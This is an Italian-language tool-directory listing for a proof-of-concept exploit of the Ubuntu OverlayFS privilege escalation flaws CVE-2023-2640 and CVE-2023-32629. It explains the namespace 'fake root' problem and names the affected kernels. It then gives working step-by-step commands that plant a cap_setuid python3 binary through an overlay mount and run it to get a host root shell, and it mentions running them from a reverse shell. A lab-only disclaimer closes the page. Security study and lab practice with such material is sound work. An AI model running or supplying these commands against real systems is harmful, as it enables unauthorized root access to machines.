Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-2640-CVE-2023-32629-Interactive-PoC — Un exploit pulito, interattivo e multi-step per Ubuntu OverlayFS (GameOver(lay)) che elude il sandbox dello user namespace per ottenere una vera shell di root sull'host. | Kitploit
Strumenti/GitHubGitHub/amar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubamar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

Un exploit pulito, interattivo e multi-step per Ubuntu OverlayFS (GameOver(lay)) che elude il sandbox dello user namespace per ottenere una vera shell di root sull'host.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
33 mesi faNon ancora revisionato

CVE-2023-2640 e CVE-2023-32629 (GameOverLay) - PoC per l'Escape Root sul Sistema Host Reale

Una Proof of Concept (PoC) interattiva e a più fasi per l'Escalation dei Privilegi Locali (LPE) che mira alle vulnerabilità OverlayFS del kernel Linux Ubuntu (CVE-2023-2640 / CVE-2023-32629).

A differenza dei soliti one-liner automatizzati che intrappolano la tua shell interattiva all'interno di un restrittivo User Namespace (Fake Root), questa metodologia suddivide la sequenza dello sfruttamento per ottenere in modo sicuro una vera shell root host senza restrizioni.


Il problema del 'Fake Root' spiegato

Molti exploit pubblici concatenano la configurazione e l'esecuzione in un'unica sequenza di shell automatizzata come questa: unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"

Poiché il payload di esecuzione Python è incorporato all'interno delle virgolette di unshare, esso viene eseguito internamente nel sandbox del namespace utente.

  • Il risultato: Il tuo ID utente risulta uid=0(root), ma la tua shell è crittograficamente isolata dall'host. Se provi a visualizzare la directory root dell'host (cd /root), otterrai un errore Permission Denied.

La Soluzione

Questa PoC suddivide il processo in due fasi logiche distinte:

  1. Armamento all'interno del Sandbox: Esegui unshare per falsificare i permessi di root giusto il tempo necessario per sfruttare il difetto ovl_copy_up di OverlayFS, rilasciando una capacità setcap cap_setuid+eip ad alta privilegio in una cartella locale di binari Python.
  2. Esecuzione all'esterno del Sandbox: Il namespace si chiude automaticamente. Il binario backdoorato viene poi eseguito direttamente dal contesto reale dell'host come utente normale senza privilegi. Il kernel legge il flag rilasciato, permette os.setuid(0) e ti conferisce veri privilegi di amministrazione di sistema a livello host.

Dettagli delle Vulnerabilità

  • CVE-2023-2640: Restrizione errata delle capacità dei file all'interno dei namespace utente nel kernel Ubuntu OverlayFS.
  • CVE-2023-32629: Difetto nella funzione ovl_copy_up_meta_inode_data del kernel Ubuntu che consente di bypassare completamente i controlli di convalida durante la migrazione dei file.
  • Sistemi interessati: Ubuntu 22.04 LTS con versioni del kernel Linux inferiori a 6.2.0-26-generic.

Istruzioni per l'Uso

Metodo 1: Script automatizzato (Consigliato)

  1. Clona o scarica exploit.sh sulla macchina di destinazione (ad esempio, in /tmp).
  2. Concedi i permessi di esecuzione ed eseguilo:
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Metodo 2: Esecuzione interattiva manuale riga per riga

Se stai lavorando con una reverse shell volatile, esegui questi comandi separatamente, premendo Enter dopo ogni riga:

root@kitploit:~
# 1. Clean workspace environment 
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Verifica i tuoi veri privilegi controllando il tuo profilo utente corrente:

root@kitploit:~
whoami
cat /root/root.txt

Crediti e Ringraziamenti

I meccanismi di base dell'exploit utilizzati in questo refactoring interattivo sono stati originariamente scoperti e documentati dai ricercatori di sicurezza Liav Eliyahu e g1vi.

Disclaimer

Questo repository è stato creato esclusivamente per scopi educativi, di ricerca sulla sicurezza e di test di penetrazione autorizzati (come i laboratori HackTheBox / OffSec). L'autore non si assume alcuna responsabilità per uso improprio, tentativi di accesso non autorizzato o danni all'infrastruttura causati da questo materiale. Usalo in modo responsabile.

Scarica lo strumento